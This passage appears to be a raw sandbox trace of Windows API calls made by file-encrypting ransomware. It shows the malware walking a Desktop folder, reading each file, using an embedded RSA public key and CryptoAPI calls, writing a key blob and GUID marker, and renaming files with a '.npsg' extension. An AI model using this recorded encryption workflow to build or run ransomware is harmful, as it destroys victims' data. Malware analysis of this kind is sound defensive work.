dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.232] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0237.233] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb650c290, ftCreationTime.dwHighDateTime=0x1d5b78f, ftLastAccessTime.dwLowDateTime=0xcffed430, ftLastAccessTime.dwHighDateTime=0x1d5bbd5, ftLastWriteTime.dwLowDateTime=0xcffed430, ftLastWriteTime.dwHighDateTime=0x1d5bbd5, nFileSizeHigh=0x0, nFileSizeLow=0xcebc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KE70feLBJuL.gif", cAlternateFileName="KE70FE~1.GIF")) returned 1 [0237.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\KE70feLBJuL.gif") returned=".gif" [0237.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\KE70feLBJuL.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ke70felbjul.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.234] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=52924) returned 1 [0237.234] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.236] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xce96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.236] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.238] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xcebc, lpOverlapped=0x0) returned 1 [0237.238] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.238] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.238] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.238] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.239] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.239] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.239] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.239] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.239] GetLastError () returned 0x0 [0237.239] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.240] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.240] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.240] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.240] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.240] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400548 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400530 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.241] GetCurrentThreadId () returned 0x5b4 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b81d78 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.242] GetCurrentThreadId () returned 0x5b4 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400530 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400548 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005a8 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400560 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005c0 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400560 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400530 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400500 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3408ee8 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.245] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xceb7, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xceb7, lpOverlapped=0x0) returned 1 [0237.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0237.245] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xcebc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.246] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.246] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.246] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.246] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.247] CloseHandle (hObject=0x644) returned 1 [0237.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0237.250] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\KE70feLBJuL.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ke70felbjul.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\KE70feLBJuL.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ke70felbjul.gif.npsg")) returned 1 [0237.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.251] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0237.253] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98670c70, ftCreationTime.dwHighDateTime=0x1d5bf65, ftLastAccessTime.dwLowDateTime=0x5009ca80, ftLastAccessTime.dwHighDateTime=0x1d5baba, ftLastWriteTime.dwLowDateTime=0x5009ca80, ftLastWriteTime.dwHighDateTime=0x1d5baba, nFileSizeHigh=0x0, nFileSizeLow=0x15b48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ohyT8Iq.m4a", cAlternateFileName="")) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.255] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\ohyT8Iq.m4a") 